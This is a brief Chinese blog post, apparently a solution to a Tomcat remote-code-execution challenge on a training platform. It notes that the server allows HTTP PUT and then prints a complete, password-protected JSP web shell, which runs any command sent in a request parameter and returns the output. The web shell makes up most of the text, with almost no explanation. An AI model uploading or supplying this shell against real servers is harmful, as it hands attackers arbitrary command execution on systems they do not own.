墨者-(RCE)Tomcat 远程代码执行漏洞利用(第1题)

options查看服务端允许得方法可以看见有put

那就写一个木马进去

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>

<%!public static String excuteCmd(String c) {

StringBuilder line = new StringBuilder();

try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));

String temp = null;while ((temp = buf.readLine()) != null) {

line.append(temp+"\n");}buf.close();} catch (Exception e) {

line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){

out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>

posted @ 2020-04-23 21:56 cat47 阅读(831) 评论(0) 编辑收藏举报

刷新页面返回顶部

cat47

死犹未肯输心去，贫亦其能奈我何!

墨者-(RCE)Tomcat 远程代码执行漏洞利用(第1题)

公告